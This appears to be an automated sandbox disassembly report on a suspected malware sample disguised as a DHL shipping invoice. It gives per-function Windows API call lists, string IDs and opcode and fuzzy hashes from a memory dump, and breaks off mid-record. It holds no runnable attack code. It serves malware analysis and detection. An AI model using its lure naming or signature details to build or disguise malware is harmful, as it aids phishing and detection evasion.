                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1471605966-0
                                                                                                                                                                                                                                      • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                                      • String ID: \StringFileInfo\
                                                                                                                                                                                                                                      • API String ID: 102104167-2245444037
                                                                                                                                                                                                                                      • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                                                                                                                                      • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MetricsSystem$PlacementWindow
                                                                                                                                                                                                                                      • String ID: AE
                                                                                                                                                                                                                                      • API String ID: 3548547718-685266089
                                                                                                                                                                                                                                      • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                                                                      • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memicmpwcslen
                                                                                                                                                                                                                                      • String ID: @@@@$History
                                                                                                                                                                                                                                      • API String ID: 1872909662-685208920
                                                                                                                                                                                                                                      • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                                                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                                      • String ID: </%s>
                                                                                                                                                                                                                                      • API String ID: 3400436232-259020660
                                                                                                                                                                                                                                      • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                                                                                                      • String ID: AE$"
                                                                                                                                                                                                                                      • API String ID: 568519121-1989281832
                                                                                                                                                                                                                                      • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                                      • String ID: caption
                                                                                                                                                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                                      • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                                      • API String ID: 210187428-168460110
                                                                                                                                                                                                                                      • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                                      • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                                      • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                                                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                                      • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                                      • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                                                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                                      • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                                                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1889144086-0
                                                                                                                                                                                                                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
